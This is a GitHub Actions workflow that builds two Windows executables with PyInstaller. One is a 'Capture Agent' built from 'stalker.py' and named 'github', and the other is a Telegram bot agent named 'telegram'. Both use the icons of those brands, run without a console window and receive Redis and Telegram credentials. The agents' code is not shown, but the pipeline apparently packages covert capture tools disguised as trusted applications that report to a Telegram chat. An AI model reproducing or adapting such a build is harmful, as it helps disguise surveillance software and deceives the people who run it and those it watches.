name: Build Windows Agents

on:
  push:
    branches: [ main ]
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Setup Python
        uses: actions/setup-python@v5
        with:
          python-version: "3.11"

      - name: Install dependencies
        run: |
          pip install pyinstaller
          pip install -r requirements.txt

      - name: Build Capture Agent
        run: |
          pyinstaller --onefile --noconsole --name github stalker.py --icon=./github.ico
        env:
          REDIS_CONNECTION: ${{ secrets.REDIS_CONNECTION }}

      - name: Build Telegram Agent
        run: |
          pyinstaller --onefile --noconsole --hidden-import=flask --hidden-import=werkzeug --hidden-import=werkzeug.serving --collect-all flask --name telegram tBotAgent.py --icon=./telegram.ico
        env:
          TELEGRAM_BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }}
          REDIS_CONNECTION: ${{ secrets.REDIS_CONNECTION }}
          TELEGRAM_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}
          
      - name: Upload artifacts
        uses: actions/upload-artifact@v4
        with:
          name: agents
          path: dist/*.exe
